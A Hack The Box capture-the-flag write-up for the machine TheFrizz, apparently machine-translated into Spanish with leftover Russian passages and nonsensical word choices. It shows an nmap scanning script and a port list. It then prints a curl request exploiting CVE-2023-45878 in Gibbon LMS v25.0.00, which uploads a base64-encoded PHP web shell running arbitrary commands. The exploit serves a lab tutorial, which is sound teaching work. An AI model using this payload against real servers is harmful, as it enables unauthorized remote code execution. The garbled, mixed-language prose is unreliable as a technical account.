Htb thefrizz. Capturamos el servidor web en Gibbon LMS-Hacker

Hoy mostraré cómo explotar una simple vascularidad web en el sistema de aprendizaje remoto de Gibbon que trabaja en Windows. Habiendo tenido la oportunidad de eliminar el código en el sistema, extraeremos a los usuarios de la base de datos y capturaremos completamente el servidor.

Nuestro objetivo final es obtener los derechos de una superpotencia por thefrizz del sitio de capacitación Hackear la caja. El nivel de complejidad de la tarea es promedio.

advertencia

Se recomienda conectarse a automóviles con HTB utilizando herramientas de anonimato y virtualización. No haga esto desde las computadoras donde hay datos importantes para usted, ya que se encontrará en una red común con otros participantes.

Inteligencia

Escaneo de puertos

Agregue la dirección IP de la máquina a /etc/hosts:

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bash

ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '

' ',' | sed s/,$//)

nmap -p$ports -A $1

Actúa en dos etapas. El primero es el escaneo rápido habitual, en el segundo: escaneo más completo, utilizando scripts existentes (opción -A).

El resultado del guión

El escáner encontró 13 puertos abiertos:

  • 22 - OpenSsh;
  • 80 (http) - Web -servidor Apache 2.4.58;
  • 88 - Kerberos;
  • 135 - Un servicio de llamadas remoto (Microsoft RPC);
  • 139 - слжжба с анс Netbios, netlogon;
  • 389 - LDAP;
  • 445 - SMB;
  • 464 - Servicio de cambio de contraseña de Kerberos;
  • 593 (http-rpc-epmap)-исползеетсe в слжбах dcom и ms intercambio;
  • 636 - LDAP сифрованиаículos tls;
  • 3268 (LDAP) - Para el acceso al catálogo global de un cliente a un controlador;
  • 3269 (LDAP) - Para el acceso al catálogo global de un cliente a un controlador a través de una conexión segura;
  • 9389 - Servicio web AD DS.

Web - servidor Vыpetnete Redirección de frizzdc.frizz.htb. Actualizar la entrada en el archivo /etc/hosts Y abrimos el sitio a través del navegador.

10.10.11.60 thefrizz.htb frizzdc.frizz.htb frizz.htb

La página principal del sitio
"

Punto de entrada

En la página de bienvenida encontramos una notificación que dice la transición a los protocolos de autenticación de Azure Active Directory y Kerberos.

El contenido de la página de bienvenida
Содержиеое сраницы Bienvenido

En la parte inferior de la página encontramos el nombre y la versión del motor del sitio: Gibbon V25.0.00. En primer lugar, vale la pena verificar si hay vulnerabilidad para ella. La forma más fácil es mirar en Google.

Buscar explotaciones en Google
Buscar explotaciones en Google

De los resultados aprendemos que Gibbon a la versión v25.0.01 es vulnerable a CVE-2023-45878. La esencia de la vulnerabilidad es que un usuario no autorizado puede cargar archivos arbitrarios al servidor, y esto le permite obtener la ejecución del código remoto a través de la carga PHP-Silel. La siguiente solicitud se carga con PHP asdf.php En el catálogo de Gibbon.

curl -X POST 'http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php' -H 'Host: frizzdc.frizz.htb' --data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8+" -d 'path=asdf.php' -d 'gibbonPersonID=0000000001'

2025-08-25 15:30:00
#Htb #thefrizz #Capturamos #servidor #web #Gibbon #LMSHacker,


Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.